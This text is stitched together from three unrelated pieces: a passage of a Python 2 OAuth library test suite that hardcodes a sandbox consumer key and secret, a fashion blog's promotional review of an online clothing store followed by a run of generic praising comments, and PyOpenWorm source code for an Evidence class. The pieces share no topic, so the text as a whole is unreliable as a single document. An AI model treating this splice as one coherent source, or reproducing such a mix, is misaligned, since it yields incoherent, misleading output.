self.token = oauth.Token(self.key, self.secret)
def test_basic(self):
self.assertRaises(ValueError, lambda: oauth.Token(None, None))
self.assertRaises(ValueError, lambda: oauth.Token('asf', None))
self.assertRaises(ValueError, lambda: oauth.Token(None, 'dasf'))
def test_init(self):
self.assertEqual(self.token.key, self.key)
self.assertEqual(self.token.secret, self.secret)
self.assertEqual(self.token.callback, None)
self.assertEqual(self.token.callback_confirmed, None)
self.assertEqual(self.token.verifier, None)
def test_set_callback(self):
self.assertEqual(self.token.callback, None)
self.assertEqual(self.token.callback_confirmed, None)
cb = 'http://www.example.com/my-callback'
self.token.set_callback(cb)
self.assertEqual(self.token.callback, cb)
self.assertEqual(self.token.callback_confirmed, 'true')
self.token.set_callback(None)
self.assertEqual(self.token.callback, None)
# TODO: The following test should probably not pass, but it does
# To fix this, check for None and unset 'true' in set_callback
# Additionally, should a confirmation truly be done of the callback?
self.assertEqual(self.token.callback_confirmed, 'true')
def test_set_verifier(self):
self.assertEqual(self.token.verifier, None)
v = oauth.generate_verifier()
self.token.set_verifier(v)
self.assertEqual(self.token.verifier, v)
self.token.set_verifier()
self.assertNotEqual(self.token.verifier, v)
self.token.set_verifier('')
self.assertEqual(self.token.verifier, '')
def test_get_callback_url(self):
self.assertEqual(self.token.get_callback_url(), None)
self.token.set_verifier()
self.assertEqual(self.token.get_callback_url(), None)
cb = 'http://www.example.com/my-callback?save=1&return=true'
v = oauth.generate_verifier()
self.token.set_callback(cb)
self.token.set_verifier(v)
url = self.token.get_callback_url()
verifier_str = '&oauth_verifier=%s' % v
self.assertEqual(url, '%s%s' % (cb, verifier_str))
cb = 'http://www.example.com/my-callback-no-query'
v = oauth.generate_verifier()
self.token.set_callback(cb)
self.token.set_verifier(v)
url = self.token.get_callback_url()
verifier_str = '?oauth_verifier=%s' % v
self.assertEqual(url, '%s%s' % (cb, verifier_str))
def test_to_string(self):
string = 'oauth_token_secret=%s&oauth_token=%s' % (self.secret,
self.key)
self.assertEqual(self.token.to_string(), string)
self.token.set_callback('http://www.example.com/my-callback')
string += '&oauth_callback_confirmed=true'
self.assertEqual(self.token.to_string(), string)
def _compare_tokens(self, new):
self.assertEqual(self.token.key, new.key)
self.assertEqual(self.token.secret, new.secret)
# TODO: What about copying the callback to the new token?
# self.assertEqual(self.token.callback, new.callback)
self.assertEqual(self.token.callback_confirmed,
new.callback_confirmed)
# TODO: What about copying the verifier to the new token?
# self.assertEqual(self.token.verifier, new.verifier)
    def test_to_string_simple(self):
tok = oauth.Token('tooken', 'seecret')
self.assertEqual(str(tok), 'oauth_token_secret=seecret&oauth_token=tooken')
def test_from_string(self):
self.assertRaises(ValueError, lambda: oauth.Token.from_string(''))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('blahblahblah'))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('blah=blah'))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token_secret=asfdasf'))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token_secret='))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token=asfdasf'))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token='))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token=&oauth_token_secret='))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token=tooken%26oauth_token_secret=seecret'))
string = self.token.to_string()
new = oauth.Token.from_string(string)
self._compare_tokens(new)
self.token.set_callback('http://www.example.com/my-callback')
string = self.token.to_string()
new = oauth.Token.from_string(string)
self._compare_tokens(new)
class TestRequest(unittest.TestCase):
def test_setter(self):
url = "http://example.com"
method = "GET"
req = oauth.Request(method)
try:
url = req.url
self.fail("AttributeError should have been raised on empty url.")
except AttributeError:
pass
except Exception, e:
self.fail(str(e))
def test_deleter(self):
url = "http://example.com"
method = "GET"
req = oauth.Request(method, url)
try:
del req.url
url = req.url
self.fail("AttributeError should have been raised on empty url.")
except AttributeError:
pass
except Exception, e:
self.fail(str(e))
def test_url(self):
url1 = "http://example.com:80/foo.php"
url2 = "https://example.com:443/foo.php"
exp1 = "http://example.com/foo.php"
exp2 = "https://example.com/foo.php"
method = "GET"
req = oauth.Request(method, url1)
self.assertEquals(req.url, exp1)
req = oauth.Request(method, url2)
self.assertEquals(req.url, exp2)
def test_get_parameter(self):
url = "http://example.com"
method = "GET"
params = {'oauth_consumer' : 'asdf'}
req = oauth.Request(method, url, parameters=params)
self.assertEquals(req.get_parameter('oauth_consumer'), 'asdf')
self.assertRaises(oauth.Error, req.get_parameter, 'blah')
def test_get_nonoauth_parameters(self):
oauth_params = {
'oauth_consumer': 'asdfasdfasdf'
}
other_params = {
'foo': 'baz',
'bar': 'foo',
'multi': ['FOO','BAR']
}
params = oauth_params
params.update(other_params)
req = oauth.Request("GET", "http://example.com", params)
self.assertEquals(other_params, req.get_nonoauth_parameters())
def test_to_header(self):
realm = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
}
req = oauth.Request("GET", realm, params)
header, value = req.to_header(realm).items()[0]
parts = value.split('OAuth ')
vars = parts[1].split(', ')
        self.assertEqual(len(vars), len(params) + 1)
res = {}
for v in vars:
var, val = v.split('=')
res[var] = urllib.unquote(val.strip('"'))
self.assertEquals(realm, res['realm'])
del res['realm']
        self.assertEqual(len(res), len(params))
for key, val in res.items():
self.assertEquals(val, params.get(key))
def test_to_postdata(self):
realm = "http://sp.example.com/"
params = {
'multi': ['FOO','BAR'],
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
}
req = oauth.Request("GET", realm, params)
flat = [('multi','FOO'),('multi','BAR')]
del params['multi']
flat.extend(params.items())
kf = lambda x: x[0]
self.assertEquals(sorted(flat, key=kf), sorted(parse_qsl(req.to_postdata()), key=kf))
def test_to_url(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
}
req = oauth.Request("GET", url, params)
exp = urlparse.urlparse("%s?%s" % (url, urllib.urlencode(params)))
res = urlparse.urlparse(req.to_url())
self.assertEquals(exp.scheme, res.scheme)
self.assertEquals(exp.netloc, res.netloc)
self.assertEquals(exp.path, res.path)
a = parse_qs(exp.query)
b = parse_qs(res.query)
self.assertEquals(a, b)
def test_get_normalized_parameters(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'multi': ['FOO','BAR'],
}
req = oauth.Request("GET", url, params)
res = req.get_normalized_parameters()
srtd = [(k, v if type(v) != ListType else sorted(v)) for k,v in sorted(params.items())]
self.assertEquals(urllib.urlencode(srtd, True), res)
def test_get_normalized_parameters_ignores_auth_signature(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_signature': "some-random-signature-%d" % random.randint(1000, 2000),
'oauth_token': "ad180jjd733klru7",
}
req = oauth.Request("GET", url, params)
res = req.get_normalized_parameters()
self.assertNotEquals(urllib.urlencode(sorted(params.items())), res)
foo = params.copy()
del foo["oauth_signature"]
self.assertEqual(urllib.urlencode(sorted(foo.items())), res)
def test_get_normalized_string_escapes_spaces_properly(self):
url = "http://sp.example.com/"
params = {
"some_random_data": random.randint(100, 1000),
"data": "This data with a random number (%d) has spaces!" % random.randint(1000, 2000),
}
req = oauth.Request("GET", url, params)
res = req.get_normalized_parameters()
expected = urllib.urlencode(sorted(params.items())).replace('+', '%20')
self.assertEqual(expected, res)
def test_sign_request(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200"
}
tok = oauth.Token(key="tok-test-key", secret="tok-test-secret")
con = oauth.Consumer(key="con-test-key", secret="con-test-secret")
params['oauth_token'] = tok.key
params['oauth_consumer_key'] = con.key
req = oauth.Request(method="GET", url=url, parameters=params)
methods = {
'TQ6vGQ5A6IZn8dmeGB4+/Jl3EMI=': oauth.SignatureMethod_HMAC_SHA1(),
'con-test-secret&tok-test-secret': oauth.SignatureMethod_PLAINTEXT()
}
for exp, method in methods.items():
req.sign_request(method, con, tok)
self.assertEquals(req['oauth_signature_method'], method.name)
self.assertEquals(req['oauth_signature'], exp)
def test_from_request(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
}
req = oauth.Request("GET", url, params)
headers = req.to_header()
# Test from the headers
req = oauth.Request.from_request("GET", url, headers)
self.assertEquals(req.method, "GET")
self.assertEquals(req.url, url)
self.assertEquals(params, req.copy())
# Test with bad OAuth headers
bad_headers = {
'Authorization' : 'OAuth this is a bad header'
}
self.assertRaises(oauth.Error, oauth.Request.from_request, "GET",
url, bad_headers)
# Test getting from query string
qs = urllib.urlencode(params)
req = oauth.Request.from_request("GET", url, query_string=qs)
exp = parse_qs(qs, keep_blank_values=False)
for k, v in exp.iteritems():
exp[k] = urllib.unquote(v[0])
self.assertEquals(exp, req.copy())
# Test that a boned from_request() call returns None
req = oauth.Request.from_request("GET", url)
self.assertEquals(None, req)
def test_from_token_and_callback(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': "137131200",
'oauth_consumer_key': "0685bd9184jfhq22",
'oauth_signature_method': "HMAC-SHA1",
'oauth_token': "ad180jjd733klru7",
'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
}
tok = oauth.Token(key="tok-test-key", secret="tok-test-secret")
req = oauth.Request.from_token_and_callback(tok)
self.assertFalse('oauth_callback' in req)
self.assertEquals(req['oauth_token'], tok.key)
req = oauth.Request.from_token_and_callback(tok, callback=url)
self.assertTrue('oauth_callback' in req)
self.assertEquals(req['oauth_callback'], url)
def test_from_consumer_and_token(self):
url = "http://sp.example.com/"
tok = oauth.Token(key="tok-test-key", secret="tok-test-secret")
con = oauth.Consumer(key="con-test-key", secret="con-test-secret")
req = oauth.Request.from_consumer_and_token(con, token=tok,
http_method="GET", http_url=url)
self.assertEquals(req['oauth_token'], tok.key)
self.assertEquals(req['oauth_consumer_key'], con.key)
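# For reference, a simplified sketch of how the HMAC-SHA1 signatures checked
# in these tests are computed (this mirrors SignatureMethod_HMAC_SHA1's
# behavior, but it is an illustrative reimplementation, not the library code):
import base64
import hashlib
import hmac

def _sketch_hmac_sha1_signature(signature_base_string, consumer_secret, token_secret=''):
    # The signing key is "<escaped consumer secret>&<escaped token secret>"
    key = '%s&%s' % (urllib.quote(consumer_secret, safe='~'),
                     urllib.quote(token_secret, safe='~'))
    # The signature is the base64-encoded HMAC-SHA1 digest of the base string
    hashed = hmac.new(key, signature_base_string, hashlib.sha1)
    return base64.b64encode(hashed.digest())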
class SignatureMethod_Bad(oauth.SignatureMethod):
name = "BAD"
def signing_base(self, request, consumer, token):
return ""
def sign(self, request, consumer, token):
return "invalid-signature"
class TestServer(unittest.TestCase):
def setUp(self):
url = "http://sp.example.com/"
params = {
'oauth_version': "1.0",
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': int(time.time()),
'bar': 'blerg',
'multi': ['FOO','BAR'],
'foo': 59
}
self.consumer = oauth.Consumer(key="consumer-key",
secret="consumer-secret")
self.token = oauth.Token(key="token-key", secret="token-secret")
params['oauth_token'] = self.token.key
params['oauth_consumer_key'] = self.consumer.key
self.request = oauth.Request(method="GET", url=url, parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
self.request.sign_request(signature_method, self.consumer, self.token)
def test_init(self):
server = oauth.Server(signature_methods={'HMAC-SHA1' : oauth.SignatureMethod_HMAC_SHA1()})
self.assertTrue('HMAC-SHA1' in server.signature_methods)
self.assertTrue(isinstance(server.signature_methods['HMAC-SHA1'],
oauth.SignatureMethod_HMAC_SHA1))
server = oauth.Server()
self.assertEquals(server.signature_methods, {})
def test_add_signature_method(self):
server = oauth.Server()
res = server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
self.assertTrue(len(res) == 1)
self.assertTrue('HMAC-SHA1' in res)
self.assertTrue(isinstance(res['HMAC-SHA1'],
oauth.SignatureMethod_HMAC_SHA1))
res = server.add_signature_method(oauth.SignatureMethod_PLAINTEXT())
self.assertTrue(len(res) == 2)
self.assertTrue('PLAINTEXT' in res)
self.assertTrue(isinstance(res['PLAINTEXT'],
oauth.SignatureMethod_PLAINTEXT))
def test_verify_request(self):
server = oauth.Server()
server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
parameters = server.verify_request(self.request, self.consumer,
self.token)
self.assertTrue('bar' in parameters)
self.assertTrue('foo' in parameters)
self.assertTrue('multi' in parameters)
self.assertEquals(parameters['bar'], 'blerg')
self.assertEquals(parameters['foo'], 59)
self.assertEquals(parameters['multi'], ['FOO','BAR'])
def test_no_version(self):
url = "http://sp.example.com/"
params = {
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': int(time.time()),
'bar': 'blerg',
'multi': ['FOO','BAR'],
'foo': 59
}
self.consumer = oauth.Consumer(key="consumer-key",
secret="consumer-secret")
self.token = oauth.Token(key="token-key", secret="token-secret")
params['oauth_token'] = self.token.key
params['oauth_consumer_key'] = self.consumer.key
self.request = oauth.Request(method="GET", url=url, parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
self.request.sign_request(signature_method, self.consumer, self.token)
server = oauth.Server()
server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
parameters = server.verify_request(self.request, self.consumer,
self.token)
def test_invalid_version(self):
url = "http://sp.example.com/"
params = {
'oauth_version': '222.9922',
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': int(time.time()),
'bar': 'blerg',
'multi': ['foo','bar'],
'foo': 59
}
consumer = oauth.Consumer(key="consumer-key",
secret="consumer-secret")
token = oauth.Token(key="token-key", secret="token-secret")
params['oauth_token'] = token.key
params['oauth_consumer_key'] = consumer.key
request = oauth.Request(method="GET", url=url, parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
request.sign_request(signature_method, consumer, token)
server = oauth.Server()
server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
self.assertRaises(oauth.Error, server.verify_request, request,
consumer, token)
def test_invalid_signature_method(self):
url = "http://sp.example.com/"
params = {
'oauth_version': '1.0',
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': int(time.time()),
'bar': 'blerg',
'multi': ['FOO','BAR'],
'foo': 59
}
consumer = oauth.Consumer(key="consumer-key",
secret="consumer-secret")
token = oauth.Token(key="token-key", secret="token-secret")
params['oauth_token'] = token.key
params['oauth_consumer_key'] = consumer.key
request = oauth.Request(method="GET", url=url, parameters=params)
signature_method = SignatureMethod_Bad()
request.sign_request(signature_method, consumer, token)
server = oauth.Server()
server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
self.assertRaises(oauth.Error, server.verify_request, request,
consumer, token)
def test_missing_signature(self):
url = "http://sp.example.com/"
params = {
'oauth_version': '1.0',
'oauth_nonce': "4572616e48616d6d65724c61686176",
'oauth_timestamp': int(time.time()),
'bar': 'blerg',
'multi': ['FOO','BAR'],
'foo': 59
}
consumer = oauth.Consumer(key="consumer-key",
secret="consumer-secret")
token = oauth.Token(key="token-key", secret="token-secret")
params['oauth_token'] = token.key
params['oauth_consumer_key'] = consumer.key
request = oauth.Request(method="GET", url=url, parameters=params)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
request.sign_request(signature_method, consumer, token)
del request['oauth_signature']
server = oauth.Server()
server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
self.assertRaises(oauth.MissingSignature, server.verify_request,
request, consumer, token)
# Request Token: http://oauth-sandbox.sevengoslings.net/request_token
# Auth: http://oauth-sandbox.sevengoslings.net/authorize
# Access Token: http://oauth-sandbox.sevengoslings.net/access_token
# Two-legged: http://oauth-sandbox.sevengoslings.net/two_legged
# Three-legged: http://oauth-sandbox.sevengoslings.net/three_legged
# Key: bd37aed57e15df53
# Secret: 0e9e6413a9ef49510a4f68ed02cd
class TestClient(unittest.TestCase):
# oauth_uris = {
# 'request_token': '/request_token.php',
# 'access_token': '/access_token.php'
# }
oauth_uris = {
'request_token': '/request_token',
'authorize': '/authorize',
'access_token': '/access_token',
'two_legged': '/two_legged',
'three_legged': '/three_legged'
}
consumer_key = 'bd37aed57e15df53'
consumer_secret = '0e9e6413a9ef49510a4f68ed02cd'
host = 'http://oauth-sandbox.sevengoslings.net'
def setUp(self):
self.mox = mox.Mox()
self.consumer = oauth.Consumer(key=self.consumer_key,
secret=self.consumer_secret)
self.body = {
'foo': 'bar',
'bar': 'foo',
'multi': ['FOO','BAR'],
'blah': 599999
}
def tearDown(self):
self.mox.UnsetStubs()
def _uri(self, type):
uri = self.oauth_uris.get(type)
if uri is None:
raise KeyError("%s is not a valid OAuth URI type." % type)
return "%s%s" % (self.host, uri)
def create_simple_multipart_data(self, data):
boundary = '---Boundary-%d' % random.randint(1,1000)
crlf = '\r\n'
items = []
for key, value in data.iteritems():
items += [
'--'+boundary,
'Content-Disposition: form-data; name="%s"'%str(key),
'',
str(value),
]
items += ['', '--'+boundary+'--', '']
content_type = 'multipart/form-data; boundary=%s' % boundary
return content_type, crlf.join(items)
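    # For data={'a': 1} the helper above yields a body like the following
    # (the boundary number is random):
    #
    #   -----Boundary-42
    #   Content-Disposition: form-data; name="a"
    #
    #   1
    #
    #   -----Boundary-42--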
def test_access_token_get(self):
"""Test getting an access token via GET."""
client = oauth.Client(self.consumer, None)
resp, content = client.request(self._uri('request_token'), "GET")
self.assertEquals(int(resp['status']), 200)
def test_access_token_post(self):
"""Test getting an access token via POST."""
client = oauth.Client(self.consumer, None)
resp, content = client.request(self._uri('request_token'), "POST")
self.assertEquals(int(resp['status']), 200)
res = dict(parse_qsl(content))
self.assertTrue('oauth_token' in res)
self.assertTrue('oauth_token_secret' in res)
def _two_legged(self, method):
client = oauth.Client(self.consumer, None)
return client.request(self._uri('two_legged'), method,
body=urllib.urlencode(self.body))
def test_two_legged_post(self):
"""A test of a two-legged OAuth POST request."""
resp, content = self._two_legged("POST")
self.assertEquals(int(resp['status']), 200)
def test_two_legged_get(self):
"""A test of a two-legged OAuth GET request."""
resp, content = self._two_legged("GET")
self.assertEquals(int(resp['status']), 200)
def test_multipart_post_does_not_alter_body(self):
self.mox.StubOutWithMock(httplib2.Http, 'request')
random_result = random.randint(1,100)
data = {
'rand-%d'%random.randint(1,100):random.randint(1,100),
}
content_type, body = self.create_simple_multipart_data(data)
client = oauth.Client(self.consumer, None)
uri = self._uri('two_legged')
expected_kwargs = {
'method':'POST',
'body':body,
'redirections':httplib2.DEFAULT_MAX_REDIRECTS,
'connection_type':None,
'headers':mox.IsA(dict),
}
httplib2.Http.request(client, uri, **expected_kwargs).AndReturn(random_result)
self.mox.ReplayAll()
result = client.request(uri, 'POST', headers={'Content-Type':content_type}, body=body)
self.assertEqual(result, random_result)
self.mox.VerifyAll()
if __name__ == "__main__":
unittest.main()
|
Thank you for living through fashion week with me! We made it through the first one! Yay! You might have noticed I was wearing new items, and I promised to tell you more about them. Here it is: my review of the Dropship Clothes online store.
You already know the short version: I enjoyed everything about it. The clothes I received were very pretty, the quality far exceeded my expectations, and the sizes were true to what they listed (items often end up bigger than promised, so I am even more thankful).
My first item was a dress. Very chic, very nice to touch. The sleeves are fantastic and they totally hold their form. It has already been through the laundry: no issues. The sleeves are just as pretty, and the skirt stays in place.
The vest. White is always a little tricky, but I will manage. The hood is big enough to fit my sort-of-big head. It is very warm: when they say it is for winter, it is for real winter. It might even work as outerwear during fall or spring. The buttons are made of a lovely material, much like wood.
The shopping experience: pleasant. Search works nicely, size charts are available for each item, and there are many options to choose from even if you are petite.
Shipping: fast, no issues, tracking provided.
I didn't get to talk to the support center because everything was super smooth.
Will I shop there for myself? Most likely yes.
And if you are not convinced yet: there is a Big Sale going on there! Grabbing a spring update for your closet at a big discount: I totally vote for it!
Hiii, I love your looks, they are so fashionable!! You made a great review with these beautiful looks!
I like the first outfit, and then I gladly followed the fly fashion week. Really unique and original!
I love your style, you pull these outfits off so well. I really love the white vest, love the black accent buttons.
I am living for that white coat combo you have. You have amazing taste and style!
The clothes look good on you, and I love the reviews. I want the white jacket.
I LOVE that white vest!! Especially the detailed closures. Beautiful!!
The clothes look super cool and my favorite pick is the white vest with hoodie, super cute and cool.
Lovely reading the review of your outfits. You look classy.
Cool! I love some of the outfits in this article. Great info, thanks.
Love the white vest! Lovely turtleneck dress as well. You look great in both outfits.
The first outfit looks so cute on you! Is it a sweater dress? I love the cozy look. Fashion week is always fun!
I absolutely love both of these looks, they're so unique. I love the dress, it looks so versatile!
It sounds like a great service! I love the looks. Super cute!
Wow the dropship dress is really cute actually. I also love the white puff jacket!
Lovely outfits; you style them so well!
I checked out the Big Sale. Lots of cute items that are reasonably priced. Great resource!
You are so petite and cute! I love your outfit choice; you wear it well!
I love the vest! It is so cute. I have a vest myself, but it is more for formal wear than anything else.
The sleeves on the dress add a nice dimension to an otherwise simple grey dress. I'm glad to hear they still kept their shape after washing.
I do really like the vest on you. But you are right, white is pretty tricky when trying to put it together in an ensemble. Looks great.
I love this outfit it fits together really well. I love the skirt, and how well it pairs with the vest.
I am so in love with your style, you look so cute and stunning. Amazing style for real.
This is so lovely! How I wish I was as talented and could pull off such a look.
This is so trendy! I wish I could wear something like this, it's so cool!
I just love to wear clothes with hoods. They make me feel so cozy and comfortable!
The white coat is so sassy! I want to have something like that too. I will have to check out this shop. I am needing some new pieces for spring!
I love the white coat. It looks perfect for spring! I love hoodies and I'm glad that this coat has one. You made some good clothing choices here!
These outfits are stylish and comfortable too. They go so well as spring wear.
These dresses look amazing! I'm usually not a dress kind of person but I feel these could suit me. Haha.
The dress is really cute with the leggings. It looks nice and warm.
That dress looks really beautiful with the white vest! Very comfortable.
Great fashionable dresses. Each has its own uniqueness. You look awesome, carrying them so well.
I agree. You have perfectly combined your clothing. Especially the dress and the vest. There is something youthful and elegant about it.
All of your outfits are on point! This looked like so much fun. I love how elegant yet edgy your outfit is.
I'm loving both of these looks. You seriously have the best style.
Nice outfits. Sounds like you have had a great experience with them! Thank you for sharing!
These dresses look so comfy and you know I am all about the comfort!
So cute! Love the looks, the dresses look really comfy! |
from PyOpenWorm import *
class EvidenceError(Exception):
pass
def _pubmed_uri_to_pmid(uri):
from urlparse import urlparse
parsed = urlparse(uri)
pmid = int(parsed.path.split("/")[2])
return pmid
def _doi_uri_to_doi(uri):
from urlparse import urlparse
from urllib2 import unquote
parsed = urlparse(uri)
doi = parsed.path.split("/")[1]
# the doi from a url needs to be decoded
doi = unquote(doi)
return doi
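# Quick sanity examples for the helpers above (URIs are illustrative):
#   _pubmed_uri_to_pmid("http://www.ncbi.nlm.nih.gov/pubmed/24098140") -> 24098140
#   _doi_uri_to_doi("http://dx.doi.org/10.1007%2Fs00454-010-9273-0") -> "10.1007/s00454-010-9273-0"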
def _url_request(url,headers={}):
import urllib2 as U
try:
r = U.Request(url, headers=headers)
s = U.urlopen(r, timeout=1)
return s
except U.HTTPError:
return ""
except U.URLError:
return ""
def _json_request(url):
import json
headers = {'Content-Type': 'application/json'}
try:
return json.load(_url_request(url,headers))
except BaseException:
return {}
class AssertsAllAbout(Property):
# TODO: Needs tests!
multiple=True
def __init__(self, **kwargs):
Property.__init__(self, 'asserts_all_about', **kwargs)
def set(self, o, **kwargs):
"""Establish the "asserts" relationship for all of the properties of the given object"""
self.owner.asserts(o)
for p in o.properties:
self.owner.asserts(p)
def get(self, **kwargs):
# traverse the hierarchy of ObjectProperties and return all of the asserts relationships...
ns = { "ow": self.base_namespace,
"ns1" : self.rdf_namespace,
"ev": self.base_namespace["Evidence"] + "/",
"ns2" : self.base_namespace["SimpleProperty"] + "/"
}
q = """
SELECT ?DataObject ?x ?prop WHERE
{
?DataObject rdf:type ow:DataObject .
?DataObject ?x ?DataObject_prop .
?DataObject_prop sp:value ?prop .
?Evidence ev:asserts ?Evidence_asserts .
filter (EXISTS { ?DataObject_prop rdf:type ow:Property . })
# object
# asserts property pattern
# general property pattern
}
"""
def triples(self, **kwargs):
#XXX: All triples here are from ``asserts``
return []
class Evidence(DataObject):
"""
A representation of some document which provides evidence like scholarly
references, for other objects.
Possible keys include::
pmid,pubmed: a pubmed id or url (e.g., 24098140)
wbid,wormbase: a wormbase id or url (e.g., WBPaper00044287)
        doi: a Digital Object Identifier (DOI) or url (e.g., s00454-010-9273-0)
Attaching evidence
-------------------
Attaching evidence to an object is as easy as::
e = Evidence(author='White et al.', date='1986')
e.asserts(Connection(pre_cell="VA11", post_cell="VD12"))
e.save()
But what does this series of statements mean? For us it means that White et al.
assert that "the cells VA11 and VD12 have a connection".
In particular, it says nothing about the neurons themselves.
Another example::
e = Evidence(author='Sulston et al.', date='1983')
e.asserts(Neuron(name="AVDL").lineageName("AB alaaapalr"))
e.save()
This would say that Sulston et al. claimed that neuron AVDL has lineage AB alaaapalr.
Now a more ambiguous example::
e = Evidence(author='Sulston et al.', date='1983')
e.asserts(Neuron(name="AVDL"))
e.save()
What might this mean? There's no clear relationship being discussed as in the
previous examples. There are two reasonable semantics for
these statements. They could indicate that Sulston et al. assert everything
about the AVDL (in this case, only its name). Or they could
indicate that Sulston et al. state the existence of AVDL. We will assume the
semantics of the latter for *most* objects. The second
intention can be expressed as::
e = Evidence(author='Sulston et al.', date='1983')
e.asserts_all_about(Neuron(name="AVDL"))
e.save()
`asserts_all_about` individually asserts each of the properties of the Neuron
including its existence. It does not recursively assert
properties of values set on the AVDL Neuron. If, for instance, the Neuron had a
*complex object* as the value for its receptor types with
    information about the receptor's name, primary agonist, etc., `asserts_all_about`
would say nothing about these. However, `asserts_all` (TODO)::
e.asserts_all(Neuron(name="AVDL",receptor=complex_receptor_object))
would make the aforementioned recursive statement.
Retrieving evidence
-------------------
.. Not tested with the latest
Retrieving evidence for an object is trivial as well ::
e = Evidence()
e.asserts(Connection(pre_cell="VA11", post_cell="VD12"))
for x in e.load():
print x
This would print all of the evidence for the connection between VA11 and VD12
It's important to note that the considerations of recursive evidence assertions
above do not operate for retrieval. Only evidence for the
particular object queried (the Connection in the example above), would be
returned and not any evidence for anything otherwise about VA11
or VD12.
Attributes
----------
asserts : ObjectProperty (value_type=DataObject)
When used with an argument, state that this Evidence asserts that the
relationship is true.
Example::
import bibtex
bt = bibtex.parse("my.bib")
n1 = Neuron("AVAL")
n2 = Neuron("DA3")
        c = Connection(pre_cell=n1, post_cell=n2)  # a synapse connection
e = Evidence(bibtex=bt['white86'])
e.asserts(c)
Other methods return objects which asserts accepts.
Example::
n1 = Neuron("AVAL")
r = n1.neighbor("DA3")
e = Evidence(bibtex=bt['white86'])
e.asserts(r)
When used without arguments, returns a sequence of statements asserted by
this evidence
Example::
import bibtex
bt = bibtex.parse("my.bib")
n1 = Neuron("AVAL")
n2 = Neuron("DA3")
        c = Connection(pre_cell=n1, post_cell=n2)  # a synapse connection
e = Evidence(bibtex=bt['white86'])
e.asserts(c)
list(e.asserts()) # Returns a list [..., d, ...] such that d==c
doi : DatatypeProperty
A Digital Object Identifier (DOI) that provides evidence, optional
pmid : DatatypeProperty
A PubMed ID (PMID) that point to a paper that provides evidence, optional
wormbaseid : DatatypeProperty
An ID from WormBase that points to a record that provides evidence, optional
author : DatatypeProperty
The author of the evidence
title : DatatypeProperty
The title of the evidence
year : DatatypeProperty
The date (e.g., publication date) of the evidence
uri : DatatypeProperty
A URL that points to evidence
Parameters
----------
doi : string
A Digital Object Identifier (DOI) that provides evidence, optional
pmid : string
A PubMed ID (PMID) that point to a paper that provides evidence, optional
wormbaseid : string
An ID from WormBase that points to a record that provides evidence, optional
author : string
The author of the evidence
title : string
The title of the evidence
year : string or int
The date (e.g., publication date) of the evidence
uri : string
A URL that points to evidence
"""
def __init__(self, conf=False, **source):
# The type of the evidence (a paper, a lab, a uri) is
# determined by the `source` key
# We keep track of a set of fields for the evidence.
# Some of the fields are pulled from provided URIs and
# some is provided by the user.
#
# Turns into a star graph
#
# Evidence field1 value1
# ; field2 value2
# ; field3 value3 .
DataObject.__init__(self, conf=conf)
self._fields = dict()
Evidence.ObjectProperty('asserts', multiple=True, owner=self)
AssertsAllAbout(owner=self)
multivalued_fields = ('author', 'uri')
for x in multivalued_fields:
Evidence.DatatypeProperty(x, multiple=True, owner=self)
